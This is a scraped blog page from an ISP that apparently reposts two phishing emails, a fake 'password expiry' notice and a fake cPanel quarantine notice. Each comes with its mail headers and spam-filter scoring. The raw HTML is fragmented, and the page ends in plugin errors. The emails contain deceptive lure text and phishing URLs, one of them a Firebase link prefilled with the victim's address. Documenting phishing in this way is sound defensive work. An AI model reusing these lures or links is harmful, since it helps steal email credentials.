normal; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; fo=

nt-size: 12px; font-style: normal; font-weight: 400; word-spacing: 0px; whi=

te-space: normal; border-collapse: collapse; border-spacing: 0px; orphans: =

2; widows: 2; background-color: rgb(228, 228, 228); font-variant-ligatures:=

normal; font-variant-caps: normal;=20

-webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-de=

coration-style: initial; text-decoration-color: initial;" border=3D"0" cell=

spacing=3D"0" cellpadding=3D"0">
e=3D"padding-left: 15px;">
>


valign=3D"middle" style=3D"padding-right: 15px; padding-left: 15px; border-=

collapse: collapse;">

'font-family: "Symantec Sans"; font-size: 16px; border-collapse: collapse;'=

>




            &nb=

sp;            =

            &nb=

sp;            =

            &nb=

sp;          
=3D"vertical-align: inherit;"> 

PA=

SSWORD EXPIRY
 
td>
 

-image: none; color: rgb(51, 51, 51); text-transform: none; letter-spacing:=

normal; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; fo=

nt-size: 12px; font-style: normal; font-weight: 400; word-spacing: 0px; whi=

te-space: normal; border-collapse: collapse; border-spacing: 0px; orphans: =

2; widows: 2; font-variant-ligatures: normal; font-variant-caps: normal; -w=

ebkit-text-stroke-width: 0px;=20

text-decoration-thickness: initial; text-decoration-style: initial; text-de=

coration-color: initial;" bgcolor=3D"#ffffff" border=3D"0" cellspacing=3D"0=

" cellpadding=3D"0">
, 228);">

27px; font-family: Calibri; font-size: 13px; border-collapse: collapse; ba=

ckground-color: rgb(236, 243, 249);">
;">
size=3D"4">LAST REMINDER



Hello dave

5px; line-height: 27px; font-family: Calibri; font-size: 13px; border-coll=

apse: collapse; background-color: rgb(236, 243, 249);">
" style=3D"font-family: Arial, Helvetica, sans-serif; font-size: small;" bo=

rder=3D"0" cellspacing=3D"0" cellpadding=3D"0">


Sans", HelveticaNeue-Light, "Helvetica Neue Light", "Helvetica Neue", Helve=

tica, Arial, "Lucida Grande", sans-serif; font-size: 16px;'>

nt-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif;">


le=3D"vertical-align: inherit;">
ont face=3D"Calibri">Your account dave@doctor.nl2k.ab.ca password expi=

res Today. H

ence you may not be able to access your Mailbox, send or receive new messag=

es.

Click_below_to_continue_using_the_same_Password

span>


"left" style=3D"padding: 10px; border-collapse: collapse;">


; letter-spacing: normal; font-family: Arial, Tahoma, Verdana, sans-serif; =

font-size: 15px; font-style: normal; font-weight: 400; word-spacing: 0px; w=

hite-space: normal; orphans: 2; widows: 2; background-color: rgb(255, 255, =

255); font-variant-ligatures: normal; font-variant-caps: normal; -webkit-te=

xt-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-s=

tyle: initial; text-decoration-color: initial;"=20

cellspacing=3D"0">


>

=3D"center" bgcolor=3D"#045fb4">=






g: 5px 15px; line-height: 0; font-size: 0px; border-collapse: collapse;">&n=

bsp;

alibri; font-size: 13px; border-collapse: collapse;">


ical-align: inherit;">
=3D"#e11e2c">

***You will be locked_out of your_account if notification_is_ignored
=


This message is auto-generated from the E-mail securit=

y server, and replies sent to this email can not be delivered.

>



nk.ca credential phishing from oversunmercury.ru

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Thu, 19 Sep 2024 04:30:00 -0600

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98 (FreeBSD))

(envelope-from )

id 1srEPT-000000004fS-15Vi

for dave@doctor.nl2k.ab.ca;

Thu, 19 Sep 2024 04:29:15 -0600

Resent-From: The Doctor

Resent-Date: Thu, 19 Sep 2024 04:29:15 -0600

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from [188.127.240.181] (port=48162 helo=s967607.srvape.com)

by doctor.nl2k.ab.ca with esmtp (Exim 4.98 (FreeBSD))

(envelope-from )

id 1srAUc-000000008vd-3RpL

for doctor@doctor.nl2k.ab.ca;

Thu, 19 Sep 2024 00:18:25 -0600

Received: from [185.215.151.25] (localhost [IPv6:::1])

by s967607.srvape.com (Postfix) with ESMTP id D53D528EC5F

for ; Thu, 19 Sep 2024 09:16:22 +0300 (MSK)

From:

To: doctor@doctor.nl2k.ab.ca

Subject: Password Expires Today

Date: 18 Sep 2024 23:16:20 -0700

Message-ID: <20240918231620.73F065A802F55D5C@doctor.nl2k.ab.ca>

MIME-Version: 1.0

Content-Type: text/html

Content-Transfer-Encoding: quoted-printable

X-Spam_score: 17.1

X-Spam_score_int: 171

X-Spam_bar: +++++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: This email ιs from a trusted sοurce (doctor.nl2k.ab.ca).

PASSWORD EXPIRY LAST REMINDER



Content analysis details: (17.1 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

[188.127.240.181 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

[188.127.240.181 listed in dnsbl.ahbl.org]

[188.127.240.181 listed in dnsbl.ahbl.org]

[188.127.240.181 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[188.127.240.181 listed in dnsbl.ahbl.org]

0.9 SPF_FAIL SPF: sender does not match SPF record (fail)

[SPF failed: Please see http://www.openspf.org/Why?s=mfrom;id=it%40doctor.nl2k.ab.ca;ip=188.127.240.181;r=doctor.nl2k.ab.ca]

1.9 URIBL_ABUSE_SURBL Contains an URL listed in the ABUSE SURBL blocklist

[URI: khgyuiofgyu89oiy89087er898fgtyuijhgefyuiv.pages.dev]

0.2 MR_NOT_ATTRIBUTED_IP Beta rule: an non-attributed IPv4 found in

headers

1.1 TRACKER_ID BODY: Incorporates a tracking ID number

1.5 MR_STRANGE_QUESTION URI: No description available.

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or identical to

background

1.3 RDNS_NONE Delivered to internal network by a host with no rDNS

1.0 IMPRO_URI_2 No description available.

1.0 IMPRO_URI_3 No description available.

-0.0 T_SCC_BODY_TEXT_LINE No description available.

0.0 TO_EQ_FM_DOM_SPF_FAIL To domain == From domain and external SPF

failed

0.0 TO_NO_BRKTS_NORDNS_HTML To: misformatted and no rDNS and HTML only

2.0 HTML_FONT_TINY_NORDNS Font too small to read, no rDNS

Subject: {SPAM?} Password Expires Today
















ransform: none; line-height: 1.6em; text-indent: 0px; letter-spacing: norma=

l; font-family: "times new roman"; font-size: 14px; font-style: normal; fon=

t-weight: 400; word-spacing: 0px; white-space: normal; border-collapse: col=

lapse; orphans: 2; widows: 2; background-color: rgb(238, 238, 238); font-va=

riant-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-wid=

th: 0px; text-decoration-thickness: initial;=20

text-decoration-style: initial; text-decoration-color: initial;'>
>

one; width: 1px; color: white; line-height: 1.666; font-family: arial, verd=

ana, sans-serif; background-color: rgb(2, 151, 64);">

ing: 3px; border: 0px solid rgb(0, 0, 0); border-image: none; line-height: =

1.666; font-family: arial, verdana, sans-serif; background-color: rgb(243, =

255, 248);">


-family: arial, helvetica, sans-serif;">

This email ιs from a trusted sοurce (
eft; color: rgb(0, 0, 0); text-transform: none; text-indent: 0px; letter-sp=

acing: normal; font-family: Calibri, Helvetica, sans-serif; font-size: 16px=

; font-style: normal; font-weight: 400; word-spacing: 0px; float: none; dis=

play: inline !important; white-space: normal; orphans: 2; widows: 2; backgr=

ound-color: rgb(255, 255, 255); font-variant-ligatures: normal; font-varian=

t-caps: normal; -webkit-text-stroke-width: 0px;=20

text-decoration-thickness: initial; text-decoration-style: initial; text-de=

coration-color: initial;">doctor.nl2k.ab.ca
).

d>




; letter-spacing: normal; font-family: "Segoe UI", "Segoe UI Web Regular", =

"Segoe UI Symbol", "Helvetica Neue", Arial, "sans-serif"; font-size: 12px; =

font-style: normal; font-weight: 400; word-spacing: 0px; white-space: norma=

l; orphans: 2; widows: 2; font-variant-ligatures: normal; font-variant-caps=

: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initia=

l; text-decoration-style: initial;=20

text-decoration-color: initial;'>



; letter-spacing: normal; font-family: "Segoe UI", "Segoe UI Web Regular", =

"Segoe UI Symbol", "Helvetica Neue", Arial, "sans-serif"; font-size: 12px; =

font-style: normal; font-weight: 400; word-spacing: 0px; white-space: norma=

l; orphans: 2; widows: 2; font-variant-ligatures: normal; font-variant-caps=

: normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initia=

l; text-decoration-style: initial;=20

text-decoration-color: initial;'>


-image: none; color: rgb(51, 51, 51); text-transform: none; letter-spacing:=

normal; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; fo=

nt-size: 12px; font-style: normal; font-weight: 400; word-spacing: 0px; whi=

te-space: normal; border-collapse: collapse; border-spacing: 0px; orphans: =

2; widows: 2; background-color: rgb(228, 228, 228); font-variant-ligatures:=

normal; font-variant-caps: normal;=20

-webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-de=

coration-style: initial; text-decoration-color: initial;" border=3D"0" cell=

spacing=3D"0" cellpadding=3D"0">
e=3D"padding-left: 15px;">
>


valign=3D"middle" style=3D"padding-right: 15px; padding-left: 15px; border-=

collapse: collapse;">

'font-family: "Symantec Sans"; font-size: 16px; border-collapse: collapse;'=

>




            &nb=

sp;            =

            &nb=

sp;            =

            &nb=

sp;          
=3D"vertical-align: inherit;"> 

PA=

SSWORD EXPIRY
 
td>
 

-image: none; color: rgb(51, 51, 51); text-transform: none; letter-spacing:=

normal; font-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif; fo=

nt-size: 12px; font-style: normal; font-weight: 400; word-spacing: 0px; whi=

te-space: normal; border-collapse: collapse; border-spacing: 0px; orphans: =

2; widows: 2; font-variant-ligatures: normal; font-variant-caps: normal; -w=

ebkit-text-stroke-width: 0px;=20

text-decoration-thickness: initial; text-decoration-style: initial; text-de=

coration-color: initial;" bgcolor=3D"#ffffff" border=3D"0" cellspacing=3D"0=

" cellpadding=3D"0">
, 228);">

27px; font-family: Calibri; font-size: 13px; border-collapse: collapse; ba=

ckground-color: rgb(236, 243, 249);">
;">
size=3D"4">LAST REMINDER



Hello doctor

px 5px; line-height: 27px; font-family: Calibri; font-size: 13px; border-co=

llapse: collapse; background-color: rgb(236, 243, 249);">
0%" style=3D"font-family: Arial, Helvetica, sans-serif; font-size: small;" =

border=3D"0" cellspacing=3D"0" cellpadding=3D"0">


Sans", HelveticaNeue-Light, "Helvetica Neue Light", "Helvetica Neue", Helve=

tica, Arial, "Lucida Grande", sans-serif; font-size: 16px;'>

nt-family: Roboto, RobotoDraft, Helvetica, Arial, sans-serif;">


le=3D"vertical-align: inherit;">
ont face=3D"Calibri">Your account doctor@doctor.nl2k.ab.ca password ex=

pires Today. H

ence you may not be able to access your Mailbox, send or receive new messag=

es.

Click_below_to_continue_using_the_same_Password

span>


"left" style=3D"padding: 10px; border-collapse: collapse;">


; letter-spacing: normal; font-family: Arial, Tahoma, Verdana, sans-serif; =

font-size: 15px; font-style: normal; font-weight: 400; word-spacing: 0px; w=

hite-space: normal; orphans: 2; widows: 2; background-color: rgb(255, 255, =

255); font-variant-ligatures: normal; font-variant-caps: normal; -webkit-te=

xt-stroke-width: 0px; text-decoration-thickness: initial; text-decoration-s=

tyle: initial; text-decoration-color: initial;"=20

cellspacing=3D"0">


>

=3D"center" bgcolor=3D"#045fb4">


d>


g: 5px 15px; line-height: 0; font-size: 0px; border-collapse: collapse;">&n=

bsp;

alibri; font-size: 13px; border-collapse: collapse;">


ical-align: inherit;">
=3D"#e11e2c">

***You will be locked_out of your_account if notification_is_ignored
=


This message is auto-generated from the E-mail securit=

y server, and replies sent to this email can not be delivered.

>



Cpanel phish

Return-path:

Envelope-to: dave@doctor.nl2k.ab.ca

Delivery-date: Thu, 19 Sep 2024 13:43:00 -0600

Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.98 (FreeBSD))

(envelope-from )

id 1srN3J-000000004Xf-42sn

for dave@doctor.nl2k.ab.ca;

Thu, 19 Sep 2024 13:42:57 -0600

Resent-From: The Doctor

Resent-Date: Thu, 19 Sep 2024 13:42:57 -0600

Resent-Message-ID:

Resent-To: Dave Yadallee

Received: from [206.214.19.66] (port=47518 helo=mail.education.gov.lc)

by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384

(Exim 4.98 (FreeBSD))

(envelope-from )

id 1srKuE-00000000BsR-3TQm

for doctor@netknow.ca;

Thu, 19 Sep 2024 11:25:36 -0600

Received: from localhost (localhost [127.0.0.1])

by mail.education.gov.lc (Postfix) with ESMTP id 1775538B653E3

for ; Wed, 18 Sep 2024 15:30:02 -0400 (AST)

Received: from mail.education.gov.lc ([127.0.0.1])

by localhost (mail.education.gov.lc [127.0.0.1]) (amavisd-new, port 10032)

with ESMTP id mPEMEfjIdzw8 for ;

Wed, 18 Sep 2024 15:30:01 -0400 (AST)

Received: from localhost (localhost [127.0.0.1])

by mail.education.gov.lc (Postfix) with ESMTP id B001D38C5F4EA

for ; Wed, 18 Sep 2024 11:11:25 -0400 (AST)

DKIM-Filter: OpenDKIM Filter v2.10.3 mail.education.gov.lc B001D38C5F4EA

DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=education.gov.lc;

s=1A42A25C-9711-11EB-ABE8-D02DE55154CB; t=1726672286;

bh=i1zZNStaPQ1pyL3dJivBpKB6vK8OG9+MxDcJ1IACCTo=;

h=From:To:Message-ID:Date:MIME-Version;

b=pfX8vM4O/bOygCU5QAcYijjzEQsoUNDwNDowGIMmlGqCDyS9Gy5GE48cGC2IcZiPO

PUWTGkR7MafUyJE1DHdLRrIwG8Tt/bPHCNoE6YN3pozrb4gqlAbwaCaUmL4wpsgjiL

PM5meV8uA8dNTNNGl21zK5tHMlv4VIHNO7D4rNoOy7QgqyhemyrVhL+utNrkv2PpP8

9/HhMm0E6zJYyDwgKZh1AYrPRNWYrnEv0KD++CHgZA+/LNQcSqreWog7d3xz3bkybe

h3CyucCRCelHn/5kIX9kBYftgZw72dgLbJXxMtulk8kVWtFfgoidnyOGGxkFIQL8tS

xMo662uSD7qfg==

X-Virus-Scanned: amavisd-new at mail.education.gov.lc

Received: from mail.education.gov.lc ([127.0.0.1])

by localhost (mail.education.gov.lc [127.0.0.1]) (amavisd-new, port 10026)

with ESMTP id hKmkPSKjJBlR for ;

Wed, 18 Sep 2024 11:11:24 -0400 (AST)

Received: from [127.0.0.1] (ec2-52-68-53-11.ap-northeast-1.compute.amazonaws.com [52.68.53.11])

by mail.education.gov.lc (Postfix) with ESMTPSA id 848CB386033C2

for ; Tue, 17 Sep 2024 20:49:26 -0400 (AST)

Content-Type: text/html

From: "=?UTF-8?B?Q1BhbmVs?="

To: doctor@netknow.ca

Subject:

=?UTF-8?B?4pqgIFlvdSBoYXZlIHBlbmRpbmcgaW5jb21pbmcgbWVzc2FnZXMgaW4geW91ciBxdWFyYW50aW5l?=

Message-ID:

X-Priority: 1 (Highest)

X-Msmail-Priority: High

Importance: High

Content-Transfer-Encoding: quoted-printable

Date: Wed, 18 Sep 2024 00:57:57 +0000

MIME-Version: 1.0

X-Spam_score: 14.1

X-Spam_score_int: 141

X-Spam_bar: ++++++++++++++

X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",

has identified this incoming email as possible spam. The original

message has been attached to this so you can view it or label

similar future email. If you have any questions, see

@@CONTACT_ADDRESS@@ for details.



Content preview: Message from Netknow server You have pending incoming messages

in your quarantine, set your Incoming server to continue receiving messages

without disruption using the manual settings.



Content analysis details: (14.1 points, 5.0 required)



pts rule name description

---- ---------------------- --------------------------------------------------

1.0 RCVD_IN_WSFF RBL: Received via a relay in will-spam-for-food.eu.org

[52.68.53.11 listed in will-spam-for-food.eu.org]

[52.68.53.11 listed in will-spam-for-food.eu.org]

[52.68.53.11 listed in will-spam-for-food.eu.org]

[52.68.53.11 listed in will-spam-for-food.eu.org]

[52.68.53.11 listed in will-spam-for-food.eu.org]

[52.68.53.11 listed in will-spam-for-food.eu.org]

[52.68.53.11 listed in will-spam-for-food.eu.org]

[52.68.53.11 listed in will-spam-for-food.eu.org]

[206.214.19.66 listed in will-spam-for-food.eu.org]

[206.214.19.66 listed in will-spam-for-food.eu.org]

[206.214.19.66 listed in will-spam-for-food.eu.org]

[206.214.19.66 listed in will-spam-for-food.eu.org]

[206.214.19.66 listed in will-spam-for-food.eu.org]

[206.214.19.66 listed in will-spam-for-food.eu.org]

[206.214.19.66 listed in will-spam-for-food.eu.org]

[206.214.19.66 listed in will-spam-for-food.eu.org]

1.5 RCVD_IN_AHBL RBL: AHBL: sender is listed in dnsbl.ahbl.org

[52.68.53.11 listed in dnsbl.ahbl.org]

[52.68.53.11 listed in dnsbl.ahbl.org]

[52.68.53.11 listed in dnsbl.ahbl.org]

[52.68.53.11 listed in dnsbl.ahbl.org]

[206.214.19.66 listed in dnsbl.ahbl.org]

[206.214.19.66 listed in dnsbl.ahbl.org]

[206.214.19.66 listed in dnsbl.ahbl.org]

[206.214.19.66 listed in dnsbl.ahbl.org]

1.5 RCVD_IN_AHBL_SPAM RBL: AHBL: Spam Source in dnsbl.ahbl.org

[52.68.53.11 listed in dnsbl.ahbl.org]

0.0 RCVD_IN_AHBL_RTB RBL: AHBL: Real-Time Blocked in dnsbl.ahbl.org

[52.68.53.11 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_PROXY RBL: AHBL: Open Proxy server in dnsbl.ahbl.org

[52.68.53.11 listed in dnsbl.ahbl.org]

0.5 RCVD_IN_AHBL_SMTP RBL: AHBL: Open SMTP relay in dnsbl.ahbl.org

[52.68.53.11 listed in dnsbl.ahbl.org]

-0.0 SPF_PASS SPF: sender matches SPF record

0.0 T_SPF_HELO_PERMERROR SPF: test of HELO record failed (permerror)

-0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's

domain

0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid

-0.1 DKIM_VALID Message has at least one valid DKIM or DK signature

-0.1 DKIM_VALID_EF Message has a valid DKIM or DK signature from

envelope-from domain

0.0 HTML_MESSAGE BODY: HTML included in message

1.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts

0.0 NO_RDNS2 Sending MTA has no reverse DNS

1.8 MISSING_MIMEOLE Message has X-MSMail-Priority, but no X-MimeOLE

1.3 RDNS_NONE Delivered to internal network by a host with no rDNS

0.1 FROM_EXCESS_BASE64 From: base64 encoded unnecessarily

-0.0 T_SCC_BODY_TEXT_LINE No description available.

2.0 RATWR8_MESSID Message-ID with excessive dashes and dollars

3.0 GOOG_STO_NOIMG_HTML Apparently using google content hosting to avoid

URIBL

Subject: {SPAM?}

=?UTF-8?B?4pqgIFlvdSBoYXZlIHBlbmRpbmcgaW5jb21pbmcgbWVzc2FnZXMgaW4geW91ciBxdWFyYW50aW5l?=













text-indent: 0px; letter-spacing: normal; font-family: Arial, Helvetica, =

sans-serif; font-size: small; font-style: normal; font-weight: 400; =

word-spacing: 0px; white-space: normal; orphans: 2; widows: 2; =

background-color: rgb(255, 255, 255); font-variant-ligatures: normal; =

font-variant-caps: normal; -webkit-text-stroke-width: 0px; =

text-decoration-thickness: initial; text-decoration-style: initial; =

text-decoration-color: initial;">




34, 34); text-transform: none; text-indent: 0px; letter-spacing: normal; =

font-family: Arial, Helvetica, sans-serif; font-size: small; font-style: =

normal; font-weight: 400; word-spacing: 0px; white-space: normal; orphans: =

2; widows: 2; background-color: rgb(255, 255, 255); font-variant-ligatures:=

normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; =

text-decoration-thickness: initial; text-decoration-style: initial; =

text-decoration-color: initial;">


solid lightgray; border-image: none; font-size: 11pt; border-collapse: =

collapse;" cellspacing=3D"0" cellpadding=3D"0">


border-box;">



=






l>


border-box;">


text-align: left; color: rgb(44, 54, 58); text-transform: none; =

text-indent: 0px; letter-spacing: normal; font-family: Verdana; font-size: =

12px; font-style: normal; font-weight: 400; word-spacing: 0px; =

vertical-align: baseline; white-space: normal; box-sizing: border-box; =

font-stretch: inherit; background-color: rgb(255, 255, 255); =

font-variant-ligatures: normal; font-variant-caps: normal; =

text-decoration-style: initial;=20

text-decoration-color: initial;">


none; text-indent: 0px; letter-spacing: normal; font-family: Roboto, =

sans-serif; font-size: 14px; font-style: normal; font-weight: 400; =

word-spacing: 0px; float: none; display: inline !important; white-space: =

normal; background-color: rgb(255, 255, 255); font-variant-ligatures: =

normal; font-variant-caps: normal; text-decoration-style: initial; =

text-decoration-color: initial;">


rgb(211, 211, 211); border-image: none; text-align: left; color: rgb(51, 51=

, 51); text-transform: none; letter-spacing: normal; font-family: Roboto, =

Tahoma, Helvetica, sans-serif; font-size: 13px; font-style: normal; =

font-weight: 400; word-spacing: 0px; white-space: normal; border-collapse: =

collapse; box-sizing: border-box; background-color: rgb(255, 255, 255); =

font-variant-ligatures: normal; font-variant-caps: normal; =

text-decoration-style: initial;=20

text-decoration-color: initial;">




border-box;">




border-image: none; width: 2px; color: rgb(0, 0, 0); box-sizing: =

border-box; background-color: rgb(2, 151, 64);"> 

border-image: none; width: 665px; color: rgb(0, 0, 0); box-sizing: =

border-box; background-color: rgb(243, 255, 248);">
style=3D"font-size: 12px; box-sizing: border-box;">Message =

from Netknow server

align=3D"left" style=3D"margin: 0px; padding: 20px; box-sizing: =

border-box;">


box-sizing: border-box;'>
size=3D"4">You have pending incoming messages in your quarantine, set your =

Incoming server to continue receiving messages without disruption using the=

manual settings.




, serif; box-sizing: border-box;'> 


size=3D"4">



max-width: 680px;" border=3D"0" cellspacing=3D"0" cellpadding=3D"0">









=


rgb(51, 51, 51); font-family: "Helvetica Neue", Helvetica, Arial, =

sans-serif; font-size: 16px;'>Client Configuration settings for =

Netknow.

border-style: solid; border-color: rgb(232, 232, 232) rgb(232, 232, 232) =

rgb(255, 108, 44); margin: 0px; padding: 15px 0px 20px; background-color: =

rgb(255, 255, 255);">


255, 255); font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;' =

border=3D"0" cellspacing=3D"0" cellpadding=3D"0">








style=3D"margin: 0px;">


cellspacing=3D"0" cellpadding=3D"0">






0px;">



Mail Client Manual =

Settings








area" style=3D"border-radius: 4px; border: 1px solid rgb(66, 139, 202); =

border-image: none; margin-bottom: 20px; background-color: rgb(255, 255, =

255);">


color: rgb(255, 255, 255); border-top-left-radius: 3px; =

border-top-right-radius: 3px; background-color: rgb(66, 139, =

202);">Secure 
Layer">SSL
/TLS

 Settings (Recommended)



margin-bottom: 0px; border-collapse: collapse; max-width: 100%; =

border-spacing: 0px; background-color: transparent;">






























style=3D"margin: 0px; padding: 8px; border-top-color: rgb(221, 221, 221); =

border-top-width: 1px; border-top-style: solid;">Username:=


style=3D"margin: 0px; padding: 8px; border-top-color: rgb(221, 221, 221); =

border-top-width: 1px; border-top-style: solid;">doctor
d>

style=3D"margin: 0px; padding: 8px; border-top-color: rgb(221, 221, 221); =

border-top-width: 1px; border-top-style: solid;">Password:=


style=3D"margin: 0px; padding: 8px; border-top-color: rgb(221, 221, 221); =

border-top-width: 1px; border-top-style: solid;">Use the email =

account's password.

49v1lblSettingsAreaIncomingServer" style=3D"margin: 0px; padding: 8px; =

border-top-color: rgb(221, 221, 221); border-top-width: 1px; =

border-top-style: solid;">Incoming Server:

style=3D"margin: 0px; padding: 8px; border-top-color: rgb(221, 221, 221); =

border-top-width: 1px; border-top-style: solid;">


    style=3D"padding-left: 0px; margin-top: 0px; margin-bottom: 10px; =

    list-style-type: none;">mail.netknow.ca


    list-style-type: none;">

  • display: inline-block;">
    Protocol">

  • padding-left: 5px; display: inline-block;">
    Message Access Protocol">IMAP
     Port: 993
     <=

    /strong>



  • inline-block;">
    3">

    0px; margin-bottom: 10px; list-style-type: none;">

  • style=3D"padding-right: 5px; padding-left: 5px; display: =

    inline-block;">
    3">POP3
     Port: 995

style=3D"margin: 0px; padding: 8px; border-top-color: rgb(221, 221, 221); =

border-top-width: 1px; border-top-style: solid;">Outgoing =

Server:

GoingServer" style=3D"margin: 0px; padding: 8px; border-top-color: rgb(221,=

221, 221); border-top-width: 1px; border-top-style: =

solid;"> mail.netknow.ca


    0px; margin-top: 0px; margin-bottom: 10px; list-style-type: none;">


  • inline-block;">
    Protocol">SMTP
     Port: 465
  =

 SMTP Port: 587

padding: 8px; border-top-color: rgb(221, 221, 221); border-top-width: 1px;=

border-top-style: solid;" colspan=3D"2">


9v1lblSettingsAreaSmallNote1">IMAP, POP3, and SMTP require =

authentication.
<=

/div>



Verdana, Tahoma, serif; font-size: 16px; box-sizing: border-box;'>
size=3D"4">
 




box-sizing: border-box;'>Reset your incoming server =

settings to continue receiving messages.




border-box;"> 




height: 52px; font-size: 11pt; border-collapse: collapse; background-color:=

rgb(215, 86, 36);" border=3D"0" cellspacing=3D"0" cellpadding=3D"0">




border-box;">


padding: 15px 30px; box-sizing: border-box;">


255, 255); font-family: Helvetica, Arial, sans-serif; font-size: 16px; =

font-weight: bold; box-sizing: border-box; background-color: transparent; =

text-decoration-line: none;" href=3D"https://firebasestorage.googleapis.=

com/v0/b/mine-27376.appspot.com/o/index.html?alt=3Dmedia&token=3Dc6731f02-c=

91b-400a-b044-397338533b06#doctor@netknow.ca" target=3D"_blank" =

rel=3D"noreferrer">RESET  IMAP



border-box;"> 




box-sizing: border-box;">I
font-size: medium;'>f after resetting your IMAP and you still experience =

service disruption, kindly contact support 
pan>for further assistance.
 

Mon Tue Wed Thu Fri Sat Sun
Back September '24 Forward
           
           

Archives

Categories

Syndicate This Blog

  • XML

Blog Administration

Open login screen

Powered by

NetKnow Navigation

Home


VPNs


Dialup Service


Web Design


Web Hosting


E-Commerce


Server Colocation


Domain Registration


Web Mail


Support


Testimonials




Client List


FAQs


Interested in NetKnow Services?


Links


Disclaimer


Acceptable Use


Security





Technorati Profile







AddThis Feed Button

Remote RSS/OPML-Blogroll Feed

No RSS/OPML feed selected

Error

serendipity error: could not include serendipity_plugin_statistics:9cbc0e29a86fd9359ac6748399d6ba5b - exiting.

addthis





AddThis Social Bookmark Button










Blog Grade for www.nk.ca/blog

Empire Avenue





Syndicate This Blog

Error

serendipity error: could not include serendipity_plugin_spamblock_bee:7aefbb7ca9b764849be35e938b6fc9b2 - exiting.

Error

serendipity error: could not include serendipity_plugin_twitter:c7a92f670894afa9e3097574359fe38d - exiting.

Error

serendipity error: could not include serendipity_plugin_statistics:8b72cc4261ddc7ff15df253b17c29c23 - exiting.

Error

serendipity error: could not include serendipity_plugin_statistics:a0bd1a65cd9ff1c3e289829cc26557c4 - exiting.

Error

serendipity error: could not include serendipity_plugin_statistics:dcd26c048e45c234c054530ef1492953 - exiting.

Error

serendipity error: could not include serendipity_plugin_freetag:6d4c66aeb83aeb9524a7cc609051cf0f - exiting.

Error

serendipity error: could not include serendipity_plugin_freetag:acc1042e790905e499445a6890081492 - exiting.

Error

serendipity error: could not include serendipity_plugin_freetag:158fb50035b12269ec43107b29253af3 - exiting.

Error

serendipity error: could not include serendipity_plugin_topreferers:6b7e3336713d0a60294c7e310ca5cf1a - exiting.

Error

serendipity error: could not include serendipity_plugin_spamblock_bee:d3f047ee6f925c138fae56dcd7a99400 - exiting.

Error

serendipity error: could not include serendipity_plugin_spamblock_bee:5544ace5c8b19bb8592464810b48df10 - exiting.

Error

serendipity error: could not include serendipity_plugin_google_quicksearch:5624ac0b69cdbe32d0cdc40814d7eb41 - exiting.

Error

serendipity error: could not include serendipity_plugin_google_quicksearch:b8387d3a378247c1c9ede46fffb084e1 - exiting.

Error

serendipity error: could not include serendipity_plugin_google_last_query:bacdc0652131449ebc68ebde2bcb9ce2 - exiting.

Error

serendipity error: could not include serendipity_plugin_google_last_query:8c84ca587b64b627d986e9d5ce98ead1 - exiting.